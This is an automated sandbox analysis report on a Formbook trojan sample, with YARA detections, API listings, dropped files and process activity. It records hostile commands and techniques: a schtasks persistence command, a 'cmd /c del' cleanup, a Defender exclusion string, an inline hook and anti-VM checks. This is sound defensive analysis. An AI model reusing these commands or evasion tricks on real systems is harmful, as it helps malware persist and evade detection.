          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_04FD9660
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9A50 NtCreateFile,LdrInitializeThunk,15_2_04FD9A50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9650 NtQueryValueKey,LdrInitializeThunk,15_2_04FD9650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9FE0 NtCreateMutant,LdrInitializeThunk,15_2_04FD9FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9780 NtMapViewOfSection,LdrInitializeThunk,15_2_04FD9780
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9710 NtQueryInformationToken,LdrInitializeThunk,15_2_04FD9710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD98F0 NtReadVirtualMemory,15_2_04FD98F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD98A0 NtWriteVirtualMemory,15_2_04FD98A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FDB040 NtSuspendThread,15_2_04FDB040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9820 NtEnumerateKey,15_2_04FD9820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD95F0 NtQueryInformationFile,15_2_04FD95F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD99D0 NtCreateProcessEx,15_2_04FD99D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9560 NtWriteFile,15_2_04FD9560
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9950 NtQueueApcThread,15_2_04FD9950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FDAD30 NtSetContextThread,15_2_04FDAD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9520 NtWaitForSingleObject,15_2_04FD9520
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9A80 NtOpenDirectoryObject,15_2_04FD9A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9670 NtQueryInformationProcess,15_2_04FD9670
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9A20 NtResumeThread,15_2_04FD9A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9610 NtEnumerateValueKey,15_2_04FD9610
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9A10 NtQuerySection,15_2_04FD9A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9A00 NtProtectVirtualMemory,15_2_04FD9A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FDA3B0 NtGetContextThread,15_2_04FDA3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD97A0 NtUnmapViewOfSection,15_2_04FD97A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9770 NtSetInformationFile,15_2_04FD9770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FDA770 NtOpenThread,15_2_04FDA770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9760 NtOpenProcess,15_2_04FD9760
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9730 NtQueryVirtualMemory,15_2_04FD9730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FDA710 NtOpenProcessToken,15_2_04FDA710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9B00 NtSetValueKey,15_2_04FD9B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F79D60 NtCreateFile,15_2_00F79D60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F79E90 NtClose,15_2_00F79E90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F79E10 NtReadFile,15_2_00F79E10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F79F40 NtAllocateVirtualMemory,15_2_00F79F40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F79D5A NtCreateFile,15_2_00F79D5A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F79E0A NtReadFile,15_2_00F79E0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F79F3A NtAllocateVirtualMemory,15_2_00F79F3A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F1B150 appears 35 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04F9B150 appears 35 times
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272310690.0000000007B80000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs gzU8odwaPalRTGB.exe
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.260380327.0000000000DF4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameExceptionFromErrorCode.exe4 vs gzU8odwaPalRTGB.exe
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272159297.0000000007880000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs gzU8odwaPalRTGB.exe
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272662463.000000000EF50000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs gzU8odwaPalRTGB.exe
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272291076.00000000079F0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs gzU8odwaPalRTGB.exe
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272908381.000000000F050000.00000002.00000001.sdmpBinary or memory string: originalfilename vs gzU8odwaPalRTGB.exe
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.272908381.000000000F050000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs gzU8odwaPalRTGB.exe
          Source: gzU8odwaPalRTGB.exeBinary or memory string: OriginalFilenameExceptionFromErrorCode.exe4 vs gzU8odwaPalRTGB.exe
          Source: gzU8odwaPalRTGB.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: gzU8odwaPalRTGB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: fgEePtnFJH.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@3/2
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeFile created: C:\Users\user\AppData\Roaming\fgEePtnFJH.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:248:120:WilError_01
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeMutant created: \Sessions\1\BaseNamedObjects\HAnHNzedhOpevTaD
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeFile created: C:\Users\user\AppData\Local\Temp\tmpDFE8.tmpJump to behavior
          Source: gzU8odwaPalRTGB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: gzU8odwaPalRTGB.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeFile read: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe 'C:\Users\user\Desktop\gzU8odwaPalRTGB.exe'
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: gzU8odwaPalRTGB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: gzU8odwaPalRTGB.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.291054222.000000000EC20000.00000002.00000001.sdmp
          Source: Binary string: RegSvcs.pdb, source: rundll32.exe, 0000000F.00000002.506707645.000000000549F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.306866453.000000000100F000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000005.00000002.306707675.0000000000DE0000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000005.00000002.306707675.0000000000DE0000.00000040.00000001.sdmp
          Source: Binary string: RegSvcs.pdb source: rundll32.exe, 0000000F.00000002.506707645.000000000549F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.291054222.000000000EC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeCode function: 0_2_00D5D65F push es; retn 0001h0_2_00D5D6BD
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeCode function: 0_2_00D5DC4E push 00000000h; iretd 0_2_00D5DC98
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00417C05 push cs; iretd 5_2_00417C22
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040AE9D push edi; ret 5_2_0040AE9F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CEB5 push eax; ret 5_2_0041CF08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CF6C push eax; ret 5_2_0041CF72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CF02 push eax; ret 5_2_0041CF08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CF0B push eax; ret 5_2_0041CF72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040B7E3 push es; ret 5_2_0040B7EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F6D0D1 push ecx; ret 5_2_00F6D0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FED0D1 push ecx; ret 15_2_04FED0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F77C05 push cs; iretd 15_2_00F77C22
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F7CEB5 push eax; ret 15_2_00F7CF08
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F6AE9D push edi; ret 15_2_00F6AE9F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F6B7E3 push es; ret 15_2_00F6B7EA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F7CF6C push eax; ret 15_2_00F7CF72
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F7CF02 push eax; ret 15_2_00F7CF08
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F7CF0B push eax; ret 15_2_00F7CF72
          Source: initial sampleStatic PE information: section name: .text entropy: 7.60992842493
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeFile created: C:\Users\user\AppData\Roaming\fgEePtnFJH.exeJump to dropped file

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: gzU8odwaPalRTGB.exe PID: 3092, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000F698E4 second address: 0000000000F698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000F69B5E second address: 0000000000F69B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409A90 rdtsc 5_2_00409A90
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe TID: 3568Thread sleep time: -99182s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe TID: 1188Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6320Thread sleep time: -54000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeThread delayed: delay time: 99182Jump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.286465022.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000006.00000000.286069464.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.286465022.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000000.265198727.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.286595495.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000006.00000000.286069464.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.278440023.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000006.00000000.286069464.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000006.00000000.286595495.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
